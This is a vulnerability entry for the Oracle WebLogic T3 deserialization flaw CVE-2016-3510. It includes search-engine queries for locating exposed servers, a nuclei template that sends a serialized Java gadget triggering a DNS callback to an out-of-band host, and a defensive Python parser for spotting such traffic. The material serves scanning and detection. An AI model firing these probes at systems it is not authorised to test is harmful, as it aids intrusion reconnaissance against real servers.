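Vulnerability information
Vulnerability name: Oracle WebLogic Server Java Object Deserialization - Remote Code Execution
Vulnerability ID:
Vulnerability type: Deserialization
Severity: Critical
Description: Oracle WebLogic Server is an enterprise Java EE application server developed by Oracle and widely used in the business-critical systems of large enterprises. It supports distributed computing and web services and is a common choice for deploying enterprise applications. The disclosed vulnerability affects a core component of WebLogic Server: through specific vectors, an attacker can execute code remotely, seriously affecting the confidentiality, integrity, and availability of the system.
The technical root cause is a flaw in WebLogic Server's Java object deserialization mechanism. An attacker can construct a malicious serialized object and send it to WebLogic Server over the T3 protocol, triggering deserialization and thereby executing arbitrary code on the server. The vulnerability requires no user interaction and has low attack complexity, which makes it extremely dangerous.
The impact is severe: an attacker can use this vulnerability to take full control of an affected WebLogic Server, execute arbitrary commands, steal sensitive data, and even deploy backdoors for long-term control of the victim system. Because WebLogic Server is usually deployed at the core of the enterprise intranet, a compromise can bring down the security defenses of the entire enterprise network. In addition, the exploitation method has been made public, which increases the risk of large-scale exploitation. Enterprises should immediately apply the security patch provided by Oracle to guard against potential attacks.
Vendor: Oracle
Product: Oracle WebLogic Server
Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.0
Search syntax: product:"oracle weblogic", http.title:"oracle peoplesoft sign-in"
Source: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2016%2FCVE-2016-3510.yaml
Type: projectdiscovery/nuclei-templates:github issues
PoC details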
```yaml
id: CVE-2016-3510

info:
  name: Oracle WebLogic Server Java Object Deserialization - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch, NaN@korelogic
  severity: critical
  description: |
    Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
  remediation: |
    Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.
  reference:
    - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
    - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html
    - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
    - http://www.securitytracker.com/id/1036373
    - https://www.tenable.com/security/research/tra-2016-21
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3510
    cwe-id: CWE-119
    epss-score: 0.93179
    epss-percentile: 0.99789
    cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: oracle
    product: weblogic_server
    shodan-query:
      - product:"oracle weblogic"
      - http.title:"oracle peoplesoft sign-in"
    fofa-query: title="oracle peoplesoft sign-in"
    google-query: intitle:"oracle peoplesoft sign-in"
  tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp

variables:
  start: "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"
  end: "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"

tcp:
  - inputs:
      - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
        read: 1024

      - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"

    host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    read-size: 4

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```
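A detection-side view of the T3 delivery path described above, added here as an example (it is not part of the nuclei template or of any Oracle code): it takes the reassembled client-to-server bytes of one TCP session, recognises the T3 hello, and counts Java serialization stream headers in each length-prefixed message. The function names, result fields and sample bytes are constructed for illustration, and the code assumes the 4-byte big-endian prefix counts the whole message.

```python
import re
import struct

# Java ObjectOutputStream header: STREAM_MAGIC 0xACED + STREAM_VERSION 0x0005.
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
# T3 hello as in the template above: "t3 <version>\n", "XX:value" lines, blank line.
T3_HELLO = re.compile(rb"t3 (\d+(?:\.\d+)*)\n((?:[A-Z]{2}:[^\n]*\n)*)\n")


def inspect_t3_stream(payload: bytes) -> dict:
    """Summarise the client-to-server bytes of one reassembled TCP session."""
    result = {"is_t3": False, "version": None, "headers": {}, "messages": []}
    hello = T3_HELLO.match(payload)
    if hello is None:
        return result  # not a T3 session (e.g. plain HTTP on the same port)
    result["is_t3"] = True
    result["version"] = hello.group(1).decode()
    for line in hello.group(2).decode("latin-1").splitlines():
        key, _, value = line.partition(":")
        result["headers"][key] = value
    offset = hello.end()
    # Assumption: each T3 message starts with a 4-byte big-endian length
    # that counts the whole message, prefix included.
    while offset + 4 <= len(payload):
        (length,) = struct.unpack(">I", payload[offset:offset + 4])
        if length < 4:
            break  # malformed prefix; stop rather than loop forever
        body = payload[offset:offset + length]
        result["messages"].append({
            "declared_length": length,
            "truncated": len(body) < length,
            "serialized_objects": body.count(JAVA_STREAM_MAGIC),
        })
        offset += length
    return result


def build_sample_session() -> bytes:
    """Constructed sample: the hello from the template plus one inert message."""
    hello = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
    body = b"\x00" * 12 + JAVA_STREAM_MAGIC + b"constructed" + JAVA_STREAM_MAGIC + b"x"
    return hello + struct.pack(">I", len(body) + 4) + body


if __name__ == "__main__":
    print(inspect_t3_stream(build_sample_session()))
```

Legitimate T3 clients also send serialized objects, so a hit matters mainly for source addresses that should never speak T3 to the listener.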